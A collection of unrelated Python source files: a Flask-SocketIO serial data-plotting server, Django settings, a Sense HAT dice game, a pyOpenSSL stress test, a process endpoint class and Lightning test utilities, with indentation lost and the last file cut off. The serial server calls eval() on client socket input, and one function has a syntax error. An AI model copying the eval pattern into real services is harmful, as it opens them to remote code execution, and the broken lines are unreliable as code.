#Function run in parallel on infinite loop with
#serves as serial listener outside of separate loop
def serialThread():
print ("Starting serial background thread.")
global desired
global serialLock
global csvLock
global serialPort
global system_parameters
global params_and_values
global expected_length
global parseFunction
global param_vals
global csv_default
global csv_recent
global alt_data
global alternate
global isSetup
global setupString
global command_terms
while True:
if serialConnected:
writeUpdates('~',0)
time.sleep(2.0)
serialLock.acquire()
try:
new_setupString = serialPort.readline()
serialPort.flushInput()
except:
print ("initi string reading issue")
serialLock.release()
new_setupString = strip_until_marker(new_setupString)
temp_commands = new_setupString.split('&')
temp_commands = temp_commands[1:-1]
if temp_commands != command_terms: #only reload the gui if the configuration setup string has changed!
command_terms = temp_commands
setupString = new_setupString
temp = setupString.split('&',1)[1]
temp = temp.rsplit('&',1)[0]
setupString = temp
try:#send up to javascript to sort its part out
socketio.emit('startup',setupString,broadcast =True)
except:
print ("failed socket")
#build structures based on setupString's contents and orderj
plot_count =0 #used for tallying plots
spaces = [] #used for determining how to chop data string (bytes per var)
s=[] #list of sliders
t=[] #list of temporal plots
h = [] #contains headroom value if that is being plotted
for x in command_terms:
if len(x)>0 and x[0] =='S': #is a slider
slider_vals = x.split('~') #chop string
#next: add key to system_parameters dict of slider name
#entry is starting val (0) and one char value used for comms
system_parameters[slider_vals[1]]=[0,slider_vals[2]]
s.append(slider_vals[1]) #add name of param to s list
#next is to fill in the param_vals list with the current value
param_vals.append(system_parameters[slider_vals[1]][0])
if len(x)>0 and x[0] == 'A': #we are alternating
vals = x.split('~') #split substring
alt_data['period'] = float(vals[2]) #period unpacked
alt_data['param'] = vals[1] #link alternate to selected parameter
if len(x)>0 and x[0]=='T': #we have a temporal plot
plot_vals = x.split('~') #split substring
t.append(plot_vals[1]) #add name to t list
#next line: append list: [num_bytes,signed/unsigned/float,etc..]
spaces.append([int(plot_vals[2][1]),plot_vals[2][0]])
plot_count +=1 #increment plot count
if len(x)>0 and x[0]=='H':
head_vals = x.split('~')
h.append("Headroom")
plot_count +=1 #headroom isn't a "plot" but treated same
if head_vals[1] =='2':
spaces.append([2,'S']) #needed since 16bit int on Arduino
elif head_vals[1] =='4':
spaces.append([4,'F']) #needed since ARM32 Teensy
params_and_values = t+h+s #in order plots, headroom, sliders
expected_length = sum(x[0] for x in spaces)+2 #2 from open/closing byte
#parse_prototype is function that will chop up incoming bytes for sending up to the GUI
def parse_prototype(listo):
new_out = []
current_index=1 #start 1 up because of start byte
for x in range(plot_count):
val = 0
if spaces[x][0] == 1:
if spaces[x][1] == 'S':
val = struct.unpack('b',listo[current_index:current_index+1])[0]
elif spaces[x][1] =='U':
val = struct.unpack('B',listo[current_index:current_index+1])[0]
elif spaces[x][0] == 2:
if spaces[x][1] == 'S':
val = struct.unpack('<h',listo[current_index:current_index+2])[0]
elif spaces[x][1] == 'U':
val = struct.unpack('H',listo[current_index:current_index+2])[0]
elif spaces[x][0] == 4:
if spaces[x][1] == 'F':
val = struct.unpack('f',listo[current_index:current_index+4])[0]
elif spaces[x][1] == 'S':
val = struct.unpack('i',listo[current_index:current_index+4])[0]
new_out.append(val)
current_index += spaces[x][0]
return new_out
parseFunction = parse_prototype
while not allGoodFromGUI:
time.sleep(1.0)
isSetup = True
else:
inform_dev() #just tell device that we are good
serialLock.acquire()
try:
serialPort.flushInput()
except:
serialLock.release()
for x in s: #reload gui and device
socketio.emit('setup slider',{0:x,1:str(system_parameters[x][0])}, broadcast=True)
#print("Writing %s to be %0.4f" %(system_parameters[x][1],system_parameters[x][0]))
writeUpdates(system_parameters[x][1],system_parameters[x][0])
time.sleep(0.1)
writeUpdates(system_parameters[x][1],system_parameters[x][0])
time.sleep(0.1)
time.sleep(1)
while serialConnected:
serialLock.acquire()
b = serialPort.read(expected_length)
if len(b) != expected_length:
print("expected=%d, actual=%d\n",len(b),expected_length)
new_data = None
if len(b) > 0 and messageRead(b,expected_length):
new_data = parseFunction(b)
if new_data != None:
try:
socketio.emit('note',new_data,broadcast =True)
except:
print ("failed socket")
if csv_yn:
temp_time = [time.time()-csv_st] #time since recording started
csvLock.acquire()
newb_list = temp_time+new_data+[system_parameters[x][0] for x in s]
csv_default.writerow(newb_list)
csv_recent.writerow(newb_list)
csvLock.release()
#elif bytesThere > expected_length:
# try:
# serialPort.flushInput()
# except:
# print ("failure to flush input")
serialLock.release()
time.sleep(0.01)
if alternate == 1:
if time.time()-alt_data['timer'] > alt_data['period']:
print ('Switch to :')
alt_data['timer'] = time.time() #reset timer
poi = alt_data['param'] #param of interest
print(type(system_parameters[poi][0]))
print(system_parameters[poi][0])
system_parameters[poi][0] = system_parameters[poi][0]*-1.0
alt_data['state'] = alt_data.get('state')*-1
writeUpdates(system_parameters[poi][1],system_parameters[poi][0])
try:
socketio.emit('state toggle', system_parameters[poi][0], broadcast=True) #tell the GUI that the desired has changed
except:
print('failed toggle socket')
print ("Stopping serial read. Returning to idle state")
time.sleep(0.01)
def strip_until_marker(input_string):
#return only text after last non-ascii character has been found
#should *always* work...closing byte of plot package is \xff which is non-ascii and
#should get caught in this scheme...there are of course ways to break this but they
#require breaking the communication contract we have setup.
new_string = ''
for x in range(len(input_string)):
poss = input_string[x:x+1]
try:
if version3:
if type(poss)==type("hi"):
poss = str.encode(poss,'ascii') #fail here possibly
char = poss.decode('ascii')
new_string+=char
except:
new_string=""
return new_string
#runtime variables...
def messageRead(buff,exp):
first = struct.unpack('b',buff[0:1])[0]
last = struct.unpack('b',buff[exp-1:exp])[0]
if first == 0 and last == -1:
return True
else:
return False
# if not version3:
# newb = buff
# buff = [ord(q) for q in newb] #converts yucky binary/string abominations of python 2.* into list of ascii numbers essentially...not issue in 3
# mcuMessage=list(range(expected))
# if buff[0] == 0 and buff[expected-1] == 255: #likely correct message
# errorF = False
# mcuMessage[0] = buff[0]
# mcuMessage[expected-1] = buff[expected-1]
# for i in range(1,expected-1):
# bufI = buff[i]
# if bufI ==0 or bufI == 255:
# errorF = True;
# mcuMessage[i] = bufI
# if not errorF:
# return mcuMessage
# return None
@app.route('/')
def index():
global thread
print ("A user connected")
if thread is None:
thread = Thread(target=serialThread)
thread.daemon = True
thread.start()
return render_template('index.html')
@socketio.on('connect')
def test_connect():
print ('hey someone connected')
ports = serial_ports() #generate list of currently connected serial ports
print (ports)
newb=[]
for p in ports:
newb.append({"comName": p})
print (json.dumps(newb))
#emit('serial list display', {'data': ports}) #emit socket with serial ports in it
emit('serial list display', newb) #emit socket with serial ports in it
#emit('my response', {'data': 'Connected'})
@socketio.on('disconnect')
def test_disconnect():
global csv_yn
global csvLock
emit('serial disconnect request',broadcast=True)
csv_yn = 0
#if current is not None and archive is not None:
csvLock.acquire()
try:
current.close()
archive.close()
except NameError:
pass #if didn't exist yet, don't try...
csvLock.release()
print('Client disconnected. Hopefully that was for the best.')
writeUpdates('~',0)#for non-autoreset devices must tell it to enter child state again
def writeUpdates(tag,val):
global serialPort
global serialLock
string_to_write = tag+' %0.2f\n' %(float(val))
print(string_to_write)
if serialConnected:
serialLock.acquire() #claim serial resource
if version3:
b = bytes(string_to_write,'UTF-8')
print(b)
serialPort.write(bytes(string_to_write,'UTF-8'))
else:
serialPort.write(string_to_write.encode('utf-8'))
#serialPort.write(string_to_write)
serialLock.release() #release serial resource back out into big scary world
else:
print ("Change in %s to value %s not written since no live serial comm exists yet" %(tag,val))
# Specs
@socketio.on('serial select')
def action(port):
global serialselection
print ('serial port changed to %s' %(port))
serialselection = port
@socketio.on('baud select')
def action(baud):
global baudselection
print ('baud changed to %s' %(baud))
baudselection = baud
@socketio.on('csv state')
def csver(csv_val):
global csv_default
global csv_recent
global current
global archive
global csv_yn
global csvLock
global csv_st
if int(csv_val) == 0:
print('closing csv files')
csv_yn = 0
csvLock.acquire()
try:
current.close()
archive.close()
except NameError:
pass #did not exist yet...totes fine
csvLock.release()
else: #do other thing
print('Trying opening csv files up!')
csv_st = time.time()
#current = open('./csv_files/current.csv',"w",encoding='utf8',newline='')
#archive = open('./csv_files/'+str(int(time.time()))+'.csv',"w",encoding='utf8',newline='')
try:
current = open('./csv_files/current.csv',"w",**kwargs)
archive = open('./csv_files/'+str(int(time.time()))+'.csv',"w",**kwargs)
csv_default = csv.writer(archive)
csv_recent = csv.writer(current)
csvLock.acquire()
csv_default.writerow(['Time']+params_and_values)
csv_recent.writerow(['Time']+params_and_values)
csvLock.release()
csv_yn = 1
print ('CSV File Open successful')
except:
print("Failed to open CSV Files")
@socketio.on('serial connect request')
def connection(already_built):
global serialConnected
global serialPort
global serialLock
global alternate
global isSetup
already_built = eval(str(already_built))
print("state of gui")
print(already_built)
isSetup = already_built['state'] #user this
print(isSetup)
alternate = 0
print ('Trying to connect to: ' + serialselection + ' ' + str(baudselection))
print (serialLock)
print (serialConnected)
try:
serialLock.acquire()
print ("Lock acquired")
serialPort = serial.Serial(serialselection, int(baudselection),timeout=4)
print ('SerialPort')
print ('Connected to ' + str(serialselection) + ' at ' + str(baudselection) + ' BAUD.')
emit('serial connected', broadcast=True) #tells page to indicate connection (in button)
serialPort.flushInput()
#serialPort.flushOutput()
serialLock.release()
serialConnected = True #set global flag
except:
print ("Failed to connect with "+str(serialselection) + ' at ' + str(baudselection) + ' BAUD.')
@socketio.on('serial disconnect request')
def discon():
global serialConnected
global serialLock
global serialPort
print ('Trying to disconnect...')
serialLock.acquire()
serialPort.close()
serialLock.release()
serialConnected = False
emit('serial disconnected',broadcast=True)
print ('Disconnected...good riddance' )
@socketio.on("disconnected")
def ending_it():
print ("We're done")
@socketio.on('change')
def action(data):
global system_parameters
data = eval(str(data))
system_parameters[data['id']][0]=float(data['val'])
writeUpdates(system_parameters[data['id']][1],system_parameters[data['id']][0])
@socketio.on('all set from gui')
def action():
global allGoodFromGUI
allGoodFromGUI = True
print("we are done from GUI Side")
inform_dev()
def inform_dev():
global serialPort
global serialLock
string_to_write = "SET\n"
if serialConnected:
serialLock.acquire() #claim serial resource
if version3:
serialPort.write(bytes(string_to_write,'UTF-8'))
else:
print(string_to_write)
serialPort.write(string_to_write)
serialPort.flushInput()
serialLock.release() #release serial resource back out into big scary world
else:
print ("can't inform device since it isn't connected...what does this even mean")
@socketio.on('alternate state')
def action(alt):
alt = int(alt)
global alternate
global alt_data
if alt == 1:
print ('%s changed to alternating at +/- %0.2f ' %(alt_data['param'],float(system_parameters[alt_data['param']][0])))
alt_data['timer'] = time.time()
alt_data['state'] = 1.0
alternate = 1
else:
print ('%s changed to fixed at %0.2f' %(alt_data['param'],float(system_parameters[alt_data['param']][0])))
alternate = 0
if __name__ == '__main__':
socketio.run(app, port=3000, debug=True)
|
settings_20210906111039.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:11").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
fun.py
|
from sense_hat import SenseHat
from time import sleep
from random import randint
import sys
from subprocess import Popen
import threading
sense = SenseHat()
default_rotation = 0
menu = ['4','6','8', '10','12','20']
angles = [180, 270, 0, 90, 180, 270, 0, 90, 180]
current_position = 1
def arrB(turn = True):
r = (255,0,0)
w = (0,0,0)
bl = (0,51,102)
br = (153,102,51)
sl = (102,102,153)
y = (255,177,0)
image = [
w,w,y,y,w,w,w,w,
w,w,bl,w,y,w,w,w,
w,w,bl,w,w,y,sl,w,
br,br,br,br,br,y,br,sl,
w,w,bl,w,w,y,sl,w,
w,w,bl,w,y,w,w,w,
w,w,y,y,w,w,w,w,
w,w,w,w,w,w,w,w
]
sense.set_pixels(image)
if turn:
for r in angles:
sense.set_rotation(r)
sleep(0.1)
def dragon(turn = True):
r = (255,0,0)
w = (0,0,0)
s = (105,105,105)
yellow (255,177,0)
image = [
w,w,w,s,r,r,r,r,
w,w,w,s,r,w,r,r,
w,w,w,s,r,r,r,r,
w,s,s,s,r,w,w,w,
r,r,r,r,r,r,r,w,
w,r,r,r,r,w,w,w,
w,r,r,r,r,w,w,w,
w,w,r,w,r,w,w,w
]
sense.set_pixels(image)
if turn:
for r in angles:
sense.set_rotation(r)
sleep(0.1)
def happyFace(turn = True):
sense.set_pixel(2, 2, (0, 0, 255))
sense.set_pixel(4, 2, (0, 0, 255))
sense.set_pixel(3, 4, (105, 105, 105))
sense.set_pixel(1, 5, (255, 0, 0))
sense.set_pixel(2, 6, (255, 0, 0))
sense.set_pixel(3, 6, (255, 0, 0))
sense.set_pixel(4, 6, (255, 0, 0))
sense.set_pixel(5, 5, (255, 0, 0))
if turn:
for r in angles:
sense.set_rotation(r)
sleep(0.1)
def rollDice(message, printDice = True, extra = None):
message_arr = message.split(' ')
message = message_arr[0]
sec_roll = None
if message == 'd20' or message == '20':
roll = randint(1,20)
elif message == 'd12' or message == '12':
roll = randint(1,12)
elif message == 'd8' or message == '8':
roll = randint(1,8)
elif message == 'd10' or message == '10':
roll = randint(1,10)
elif message == 'd6' or message == '6':
roll = randint(1,6)
elif message == 'd4' or message == '4':
roll = randint(1,4)
else:
roll = 'Error'
# Handling disadvantage and advantage roll
if extra == 'di': # roll in disadvantage
print('first roll: ' + str(roll))
if message == 'd20' or message == '20':
sec_roll = randint(1,20)
if(sec_roll < roll):
roll = sec_roll
elif message == 'd12' or message == '12':
sec_roll = randint(1,12)
if(sec_roll < roll):
roll = sec_roll
elif message == 'd8' or message == '8':
sec_roll = randint(1,8)
if(sec_roll < roll):
roll = sec_roll
elif message == 'd10' or message == '10':
sec_roll = randint(1,10)
if(sec_roll < roll):
roll = sec_roll
elif message == 'd6' or message == '6':
sec_roll = randint(1,6)
if(sec_roll < roll):
roll = sec_roll
elif message == 'd4' or message == '4':
sec_roll = randint(1,4)
if(sec_roll < roll):
roll = sec_roll
elif extra == 'ad': #roll in advantage
print('first roll: ' + str(roll))
if message == 'd20' or message == '20':
sec_roll = randint(1,20)
if(sec_roll > roll):
roll = sec_roll
elif message == 'd12' or message == '12':
sec_roll = randint(1,12)
if(sec_roll > roll):
roll = sec_roll
elif message == 'd8' or message == '8':
sec_roll = randint(1,8)
if(sec_roll > roll):
roll = sec_roll
elif message == 'd10' or message == '10':
sec_roll = randint(1,10)
if(sec_roll > roll):
roll = sec_roll
elif message == 'd6' or message == '6':
sec_roll = randint(1,6)
if(sec_roll > roll):
roll = sec_roll
elif message == 'd4' or message == '4':
sec_roll = randint(1,4)
if(sec_roll > roll):
roll = sec_roll
if sec_roll:
print('sec roll:' + str(sec_roll))
if printDice:
print('roll: ' + str(roll))
return str(roll)
def inputMessage(e,message = None,process = None):
try:
if not message:
message = input('Type of dice (type "q" to quit):')
if message == 'q':
if process:
process.kill()
sense.show_message('')
e.set()
raise ValueError('Program Exit')
elif 'di' in message:
arrB()
roll = rollDice(message, True, 'di')
process = Popen(['python3', './fun1.py', roll])
message = input('Type of dice (type "q" to quit):')
process.kill()
sense.show_message('')
happyFace(False)
inputMessage(e, message, process)
elif 'ad' in message:
arrB()
roll = rollDice(message, True, 'ad')
process = Popen(['python3', './fun1.py', roll])
message = input('Type of dice (type "q" to quit):')
process.kill()
sense.show_message('')
happyFace(False)
inputMessage(e, message, process)
else:
arrB()
roll = rollDice(message)
process = Popen(['python3', './fun1.py', roll])
message = input('Type of dice (type "q" to quit):')
process.kill()
sense.show_message('')
happyFace(False)
inputMessage(e, message, process)
except ValueError as err:
print(err)
except KeyboardInterrupt:
print('exception')
inputMessage()
def joystick(e):
global current_position
sense.set_rotation(default_rotation)
idle = False
while not e.isSet():
event = sense.stick.wait_for_event()
if event.direction == 'up' and (event.action == 'pressed' or event.action == 'held'):
idle = False
if current_position < len(menu):
current_position += 1
sense.set_rotation(0)
sense.show_message(menu[current_position-1], 0.05, text_colour=(200,200,200))
elif event.direction == 'down' and (event.action == 'pressed' or event.action == 'held'):
idle = False
if current_position > 1:
current_position -= 1
sense.set_rotation(0)
sense.show_message(menu[current_position-1], 0.05, text_colour=(200,200,200))
elif event.direction == 'middle' and event.action == 'held':
idle = True
sense.show_letter(' ')
if not idle:
happyFace(False)
def movementDetec(e):
x = round(sense.get_accelerometer_raw()['x'], 2)
y = round(sense.get_accelerometer_raw()['y'], 2)
z = round(sense.get_accelerometer_raw()['z'], 2)
threshold = 0.80
while not e.isSet():
acceleration = sense.get_accelerometer_raw()
x_tmp = round(acceleration['x'],2)
y_tmp = round(acceleration['y'],2)
z_tmp = round(acceleration['z'],2)
if abs(x_tmp - x) > threshold or abs(y_tmp - y) > threshold or abs(z_tmp - z) > threshold:
roll = rollDice(menu[current_position-1],False)
arrB()
for i in range(3):
sense.show_message(roll, 0.08,text_colour=(200,200,200))
happyFace(False)
sleep(3)
x = x_tmp
y = y_tmp
z = z_tmp
if __name__ == '__main__':
arrB(False)
#happyFace(False)
threads = []
e = threading.Event()
t1 = threading.Thread(target=inputMessage, args=(e,))
threads.append(t1)
t2 = threading.Thread(target=joystick, args=(e,))
threads.append(t2)
t3 = threading.Thread(target=movementDetec, args=(e,))
threads.append(t3)
for i in threads:
i.start()
for i in threads:
i.join()
sense.show_letter(' ')
|
thread-key-gen.py
|
# Copyright (C) Jean-Paul Calderone
# See LICENSE for details.
#
# Stress tester for thread-related bugs in RSA and DSA key generation. 0.12 and
# older held the GIL during these operations. Subsequent versions release it
# during them.
from threading import Thread
from OpenSSL.crypto import TYPE_RSA, TYPE_DSA, PKey
def generate_rsa():
keys = []
for i in range(100):
key = PKey()
key.generate_key(TYPE_RSA, 1024)
keys.append(key)
def generate_dsa():
keys = []
for i in range(100):
key = PKey()
key.generate_key(TYPE_DSA, 512)
keys.append(key)
def main():
threads = []
for i in range(3):
t = Thread(target=generate_rsa, args=())
threads.append(t)
t = Thread(target=generate_dsa, args=())
threads.append(t)
for t in threads:
t.start()
main()
|
proc_endpoint.py
|
""" SNR framework for scheduling and task management
Node: Task queue driven host for data and endpoints
AsyncEndpoint: Generate and process data for Nodes
Relay: Server data to other nodes
"""
import signal
from time import time
from typing import Callable
from multiprocessing import Process
from snr.endpoint import Endpoint
from snr.node import Node
from snr.utils.utils import sleep
from snr.profiler import Timer
class ProcEndpoint(Endpoint):
"""An Asynchronous endpoint of data for a node
An AsyncEndpoint is part of a node, and runs in its own thread. An
endpoint may produce data to be stored in the Node or retreive data from
the Node. The endpoint has its loop handler function run according to its
tick_rate (Hz).
"""
def __init__(self, parent: Node, name: str,
setup_handler: Callable, loop_handler: Callable,
tick_rate_hz: float):
super().__init__(parent, name)
self.setup = setup_handler
self.loop_handler = loop_handler
self.terminate_flag = False
self.set_delay(tick_rate_hz)
if parent:
self.profiler = parent.profiler
else:
self.profiler = None
def set_delay(self, tick_rate_hz: float):
if tick_rate_hz == 0:
self.delay = 0.0
else:
self.delay = 1.0 / tick_rate_hz
def start_loop(self):
self.dbg("framework", "Starting proc endpoint {} process", [self.name])
self.proc = self.get_proc()
self.proc.start()
def get_proc(self):
return Process(target=self.threaded_method, daemon=True)
def join(self):
self.set_terminate_flag()
self.proc.join()
def threaded_method(self):
# signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
self.setup()
while not self.terminate_flag:
if self.profiler is None:
self.loop_handler()
else:
self.profiler.time(self.name, self.loop_handler)
# self.dbg("profiling_endpoint",
# "Ran {} task in {:6.3f} us",
# [self.name, runtime * 1000000])
self.tick()
except (Exception, KeyboardInterrupt) as e:
self.dbg("proc_endpoint_error", "{}, e: {}", [self.name, e])
self.set_terminate_flag()
self.dbg("framework", "Proc endpoint {} exited loop", [self.name])
self.terminate()
return
def get_name(self):
return self.name
def tick(self):
if (self.delay == 0.0):
self.dbg("framework_warning",
"proc_endpoint {} does not sleep (max tick rate)",
[self.name])
else:
sleep(self.delay)
def set_terminate_flag(self):
self.terminate_flag = True
self.dbg("framework", "Terminating proc_endpoint {}", [self.name])
def terminate(self):
raise NotImplementedError
|
utils.py
|
from bitcoin.core import COIN # type: ignore
from bitcoin.rpc import RawProxy as BitcoinProxy # type: ignore
from bitcoin.rpc import JSONRPCError
from contextlib import contextmanager
from pathlib import Path
from pyln.client import RpcError
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve # type: ignore
from pyln.client import LightningRpc
from pyln.client import Millisatoshi
import json
import logging
import lzma
import math
import os
import psutil # type: ignore
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
import warnings
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"fallbackfee": Decimal(1000) / COIN,
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
FUNDAMOUNT = 10**6
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
DEPRECATED_APIS = env("DEPRECATED_APIS", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
raise ValueError("Timeout while waiting for {}", success)
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
self.err_logs = []
self.prefix = ""
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
line = line.decode('UTF-8', 'replace').rstrip()
if self.log_filter(line):
continue
if self.verbose:
sys.stdout.write("{}: {}\n".format(self.prefix, line))
with self.logs_cond:
self.logs.append(line)
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
for line in iter(self.proc.stderr.readline, ''):
if line is None or len(line) == 0:
break
line = line.rstrip().decode('UTF-8', 'replace')
self.err_logs.append(line)
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def is_in_stderr(self, regex):
"""Look for `regex` in stderr."""
ex = re.compile(regex)
for l in self.err_logs:
if ex.search(l):
logging.debug("Found '%s' in stderr", regex)
return l
logging.debug("Did not find '%s' in stderr", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
